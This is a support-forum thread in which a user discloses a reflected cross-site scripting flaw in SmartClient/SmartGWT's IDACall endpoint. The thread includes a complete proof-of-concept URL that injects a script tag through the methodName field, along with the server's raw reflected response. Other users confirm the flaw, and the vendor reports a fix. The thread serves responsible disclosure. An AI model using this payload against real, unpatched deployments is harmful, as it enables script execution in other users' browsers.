Announcement

Collapse
No announcement yet.
X
Collapse
  • Page of 1
  • Filter
  • Time
Clear All
new posts
Previous template Next
    #1

    Reflected Cross-site Scripting in IDACall endpoint

    Hi,

    I ran some vulnerability tests on our system since we are using the SmartGWT framework.
    During the testing, we were able to inject a Reflected Cross-Site Scripting (XSS) payload in the IDACall endpoint.

    To reproduce the issue, paste the URL below into a browser.

    URL:
    Code:
    http://serverurl/administratortool/sc/IDACall?&isc_rpc=1&isc_tnum=300&_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A//www.w3.org/2000/10/XMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E5%3C/transactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CappID%3Eisc_builtin%3C/appID%3E%3CclassName%3Ebuiltin%3C/className%3E%3CmethodName%3Etest123%26lt%3B/TEXTAREA+%26gt%3B%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B/script%26gt%3Bl123%3C/methodName%3E%3Cis_ISC_RPC_DMI+xsi%3Atype%3D%22xsd%3Aboolean%22%3Etrue%3C/is_ISC_RPC_DMI%3E%3C/elem%3E%3C/operations%3E%3Ccallback%3Etest123%3C/callback%3E%3C/transaction%3E&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
    Inside _transaction, we injected the methodName value with: "test123</TEXTAREA ><script>alert(document.domain)</script>l123" and an alert showing document.domain will appear.

    We also tested this using Burp Suite, and here’s the raw response :

    [HTML]
    <HTML>
    <BODY ONLOAD='var results = document.formResults.results.value;null'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
    //isc_RPCResponseStart-->[{data:"Attempt to execute RPC DMI Builtin 'test123</TEXTAREA ><script>alert(document.domain)</script>l123' DENIED by server.properties configuration. To enable this method, add it to the list of methods under RPCManager.enabledBuiltinMethods in server.properties",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
    </BODY></HTML>
    [/HTML]


    May I ask if this is a vulnerability issue came from SmartGWT framework?
    Is there a recommended way to prevent?

    Thank you.
    Last edited by Marco123; 25 Nov 2025, 10:34.
    Tags: None
    #2
    What product and version are you using?

    Be sure to update to the latest patched build (see smartclient.com/builds) before claiming any vulnerabilities.

    Comment

      #3
      Hi Isomorphic, I’m not a security expert, but this seems to happen with:

      SmartClient Version: v13.1p_2025-11-19/Enterprise Deployment (built 2025-11-19)

      Comment

        #4
        For me too, just by calling this URL (v13.1p_2025-11-25). Question is, can one trigger this request from the application itself?

        Comment

          #5
          Hi Isomorphic , thank you for the quick response.

          We are using SmartClient Version: v12.1p_2021-07-14/PowerEdition Deployment (built 2021-07-14)

          May I ask if this has been resolved in the latest patched build of v12.1p?

          Comment

            #6
            Thanks for the report, and the confirmations from other community members. This issue should be fixed in all versions from 11.0 onwards as of today's builds (ie, those dated November 27)

            Comment

            Previous template Next
            Working...
            X